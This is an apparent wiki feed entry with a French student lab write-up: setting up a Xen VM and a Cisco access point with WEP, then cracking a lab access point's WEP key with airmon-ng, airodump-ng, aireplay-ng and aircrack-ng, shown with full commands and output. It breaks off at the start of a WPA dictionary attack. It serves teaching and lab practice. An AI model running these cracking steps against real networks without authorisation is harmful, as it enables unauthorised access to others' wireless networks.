<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Cvillain</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Cvillain"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Cvillain"/>
		<updated>2026-05-13T19:15:32Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G3&amp;diff=37284</id>
		<title>TP sysres IMA2a5 2016/2017 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G3&amp;diff=37284"/>
				<updated>2017-01-16T10:08:23Z</updated>
		
		<summary type="html">&lt;p&gt;Cvillain : Page créée avec « == Machine virtuelle ==  Le but est de créer une machine virtuelle Xen Linux sur le dom0 cordouan.insecserv.deule.net  Création de la machine &amp;lt;pre&amp;gt;xen-create-image --hostna... »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
Le but est de créer une machine virtuelle Xen Linux sur le dom0 cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Création de la machine&lt;br /&gt;
&amp;lt;pre&amp;gt;xen-create-image --hostname Gringe --ip 193.48.57.180 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de la machine&lt;br /&gt;
&amp;lt;pre&amp;gt;xl create Gringe.cvg&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connexion à la machine&lt;br /&gt;
&amp;lt;pre&amp;gt;xl console Gringe &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration des paramètres de la carte réseau.&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.180&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Point d'accès Cisco ==&lt;br /&gt;
&lt;br /&gt;
Pour configurer la borne d'accès Wi-Fi Cisco, on commence par la connecter à un port USB du pc via un adaptateur.&lt;br /&gt;
On repère ensuite sur quel port on s'est connecté&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On se connecte sur la borne à l'aide de minicom. Il ne faut pas oublier de passer en root d'abord.&lt;br /&gt;
&amp;lt;pre&amp;gt;su&lt;br /&gt;
minicom -os&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois minicom démarré, il faut modifier certains paramètres pour pouvoir communiquer&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant on se connecte en root sur le Cisco&lt;br /&gt;
&amp;lt;pre&amp;gt;enable&lt;br /&gt;
config terminal&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on configure de SSID et le mot de passe&lt;br /&gt;
&amp;lt;pre&amp;gt;ap(config)#dot11 ssid Pocahontas&lt;br /&gt;
ap(config-ssid)#dot11 ssid Pocahontas &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
ap(config-if)#ssid Pocahontas&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 0123456789 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On souhaite sécuriser la connexion en n'autorisant que certaines adresses MAC à se connecter. Pour cela on repère d'abord notre adresse MAC&lt;br /&gt;
&amp;lt;pre&amp;gt;su&lt;br /&gt;
ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les eeePC on regarde HWaddr de l'interface wlan0. Par exemple sur ce PC pour l'interface eth0 cela ressemble à ça&lt;br /&gt;
&amp;lt;Pre&amp;gt;eth0      Link encap:Ethernet  HWaddr 00:22:4d:7a:ea:a1  &lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:19569 errors:0 dropped:166 overruns:0 frame:0&lt;br /&gt;
          TX packets:4408 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 txqueuelen:1000 &lt;br /&gt;
          RX bytes:10043846 (9.5 MiB)  TX bytes:543435 (530.6 KiB)&lt;br /&gt;
          Interrupt:20 Memory:f6500000-f6520000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin on refuse toutes les connexions sauf celles qui on la bonne adresse&lt;br /&gt;
&amp;lt;pre&amp;gt;ap(config)#access-list 701 permit  0022.4d7a.eaa1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la point d'accès configuré, on peut connecter l'eeePC à la borne. Pour cela on commence par modifier le fichier /etc/network/interfaces&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet dhcp&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid Pochontas&lt;br /&gt;
	wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'un point d'accès WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour cette attaque on utilise aircrack-ng. On démarre sur notre interface Wi-Fi.&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On scan le réseau&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On souhaite attaquer la cracotte03, on se focalise donc dessus.&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On observe CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour augmenter le nombre de paquet qui transitent, on va stimuler la borne. Pour cela on ouvre un autre terminal et on utilise airplay.&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour trouver la clé, on ouvre un autre terminal et on utilise aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'un point d'accès WPA/PSK ==&lt;br /&gt;
&lt;br /&gt;
Cette fois-ci il va falloir fournir un dictionnaire à aircrack-ng pour qu'il &amp;quot;brut force&amp;quot; le point d'accès.&lt;br /&gt;
Pour simplifier, on a décider que le mot de passe du point d'accès sera uniquement composé de chiffres. &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Cvillain</name></author>	</entry>

	</feed>